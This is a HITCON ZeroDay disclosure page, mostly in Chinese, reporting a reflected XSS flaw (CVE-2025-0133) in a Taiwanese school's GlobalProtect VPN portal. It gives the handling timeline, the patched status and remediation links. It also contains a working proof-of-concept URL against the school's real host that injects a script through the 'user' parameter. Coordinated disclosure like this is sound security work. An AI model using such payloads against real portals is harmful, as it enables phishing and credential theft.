國立竹科實中 GlobalProtect VPN Portal 反射型 XSS

Vulnerability Overview

ZDID: ZD-2025-00682
發信 Vendor: TACERT台灣學術網路危機處理中心
Title: 國立竹科實中 GlobalProtect VPN Portal 反射型 XSS
Introduction: GlobalProtect VPN Portal 反射型 XSS

處理狀態

目前狀態

公開

Last Update : 2025/07/26

新提交
已審核
已通報
已修補
未複測
公開

處理歷程

2025/07/03 20:29:24 : 新提交 (由 anonymous 更新此狀態)
2025/07/07 23:28:12 : 審核完成 (由 HITCON ZeroDay 服務團隊更新此狀態)
2025/07/17 15:52:14 : 修補中 (由 HITCON ZeroDay 服務團隊更新此狀態)
2025/07/17 15:52:14 : 審核完成 (由 HITCON ZeroDay 服務團隊更新此狀態)
2025/07/17 15:52:14 : 修補中 (由 HITCON ZeroDay 服務團隊更新此狀態)
2025/07/18 11:41:13 : 已修補 (由組織帳號更新此狀態)
2025/07/26 03:00:10 : 公開 (由 HITCON ZeroDay 平台自動更新)

詳細資料

ZDID：ZD-2025-00682
通報者：xcultivation (anonymous)
風險：中
類型：反射型跨站腳本攻擊 (Reflected Cross-Site Scripting)

參考資料

攻擊者可經由該漏洞竊取使用者身份，或進行掛碼、轉址等攻擊行為。

漏洞說明： OWASP - Cross-site Scripting (XSS)
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)

防護原則： OWASP - XSS (Cross Site Scripting) Prevention Cheat Sheet
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet

防禦繞過方式： OWASP - XSS Filter Evasion Cheat Sheet
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet

(本欄位資訊由系統根據漏洞類別自動產生，做為漏洞參考資料。)

敘述

此漏洞為CVE-2025-0133

https://nvd.nist.gov/vuln/detail/CVE-2025-0133

概念性驗證(Proof of Concept)

payload

https://untrust.nehs.hc.edu.tw/ssl-vpn/getconfig.esp?client-type=1&protocol-version=p1&app-version=3.0.1-10&clientos=Linux&os-version=linux-64&hmac-algo=sha1%2Cmd5&enc-algo=aes-128-cbc%2Caes-256-cbc&authcookie=12cea70227d3aafbf25082fac1b6f51d&portal=us-vpn-gw-N&user=%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Cscript%3Eprompt%28%22XSStest%22%29%3C%2Fscript%3E%3C%2Fsvg%3E&domain=%28empty_domain%29&computer=computer

影響

該漏洞會在經過驗證的 Captive Portal 瀏覽器上下文中執行惡意 JavaScript, 主要風險在於可能導致憑證被盜的網路釣魚攻擊

修補建議

參考 https://security.paloaltonetworks.com/CVE-2025-0133

擷圖

留言討論

聯絡組織

發送私人訊息

您也可以透過私人訊息的方式與組織聯繫，討論有關於這個漏洞的相關資訊。

國立竹科實中 GlobalProtect VPN Portal 反射型 XSS - HITCON ZeroDay

Vulnerability Detail Report